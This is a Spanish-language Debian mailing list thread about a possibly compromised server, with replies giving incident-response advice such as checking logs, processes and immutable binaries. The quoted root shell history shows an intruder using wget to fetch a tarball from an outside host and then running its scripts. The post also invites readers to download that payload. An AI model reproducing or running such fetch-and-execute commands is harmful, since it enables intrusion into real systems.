[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Posible intrusión un server



revisa estos enlaces..
http://guias.ovh.es/ServidorHackee
http://guias.ovh.es/ServidorSemihackeado2

http://guias.ovh.es/ServidorSemiHackeado

la información estas diseñada para servidores virtuales..
pero igual te puede ayudar:



Díaz Luis
http://www.facebook.com/diazluis2007
User Linux 532223
progjuegos.com
TSU Analisis de Sistemas
Universidad de Carabobo
Facultad de Odontología





El 12 de junio de 2011 14:27, Juan Antonio <pushakk@limbo.ari.es> escribió:
El 13/05/11 17:39, ciracusa escribió:
> Lista, buenas tardes.
>
> Perdón si este tema no esta directamente relacionado con Debian, pero
> como el server en cuestión tiene Squeeze y es un tema de seguridad creo
> que puede interesarles a mas de uno.
>
> Ayer viendo el history de root de un servidor veo lo siguiente:
>
>   314  ./go.sh 189
>   315  w
>   316  cd
>   317  cd /var/tmp/
>   318  rm -rf gosh
>   319  ls -a
>   320  exit
>   321  cat /proc/cpuinfo
>   322  passwd
>   323  cd /var/tmp/
>   324  cd gosh
>   325  touch bios.txt
>   326  chmod +x *
>   327  screen
>   328  exit
>   329  cat /proc/cpuinfo
>   330  cd /var/tmp/
>   331  ls -a
>   332  wget http://gblteam.webs.com/gosh.tgz.tar
>   333  tar zxvf gosh.tgz.tar
>   334  rm -rf gosh.tgz.tar
>   335  cd gosh
>   336  touch bios.txt
>   337  chmod +x *
>   338  ./go.sh 200
>   339  cd
>   340  cd /var/tmp/
>   341  ls -a
>   342  rm -rf gosh
>   343  ls -a
>   344  exit
>   345  cd /var/tmp/
>   346  perl x.pl
>
>
> Que opinan?
>
> Entiendo -lamentablemente- que el server fue comprometido, pero lo que
> no llego a comprender es el alcance de esto.
>
> Notar que puse el link para que puedan descargarlo uds. también y
> analizarlo (tomando las precauciones del caso).
>
> Bueno, si alguien tiene algo de info muy agradecido.
>
> Y si pueden recomendarme algunos pasos para analizar la seguridad del
> server desde ya muchas gracias.
>
> Salu2.
>
>

El tipo trabaja en /var/tmp asi que probablemente sea porque no tiene
acceso como superusuario. Haz un ls -l del archivo que subió y mira el
propietario, asi sabras que usuario es el que tienes comprometido. Y
como te han dicho revisa los log del sistema para ver como lo hicieron.

Por otra parte, te recomiendan que reinstales sin saber si quiera el
alcance de la intrusión, yo no lo haría hasta estar seguro que te la
hayan metido hasta el fondo. Usa ps, lsof, netstat y demas para ver si
hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr
para buscar atributos que no deberían tener binarios del sistema como
ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no
puedas sustituirlos.

Un saludo.

--
"Tanto en los deportes como en todo lo demás, soy un experto. Pero para
mantener viva mi inteligencia natural y fuera de serie, tengo que comer
mucho"


--
To UNSUBSCRIBE, email to debian-user-spanish-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Archive: 4DF50C26.1070104@limbo.ari.es" target="_blank">http://lists.debian.org/4DF50C26.1070104@limbo.ari.es



Reply to: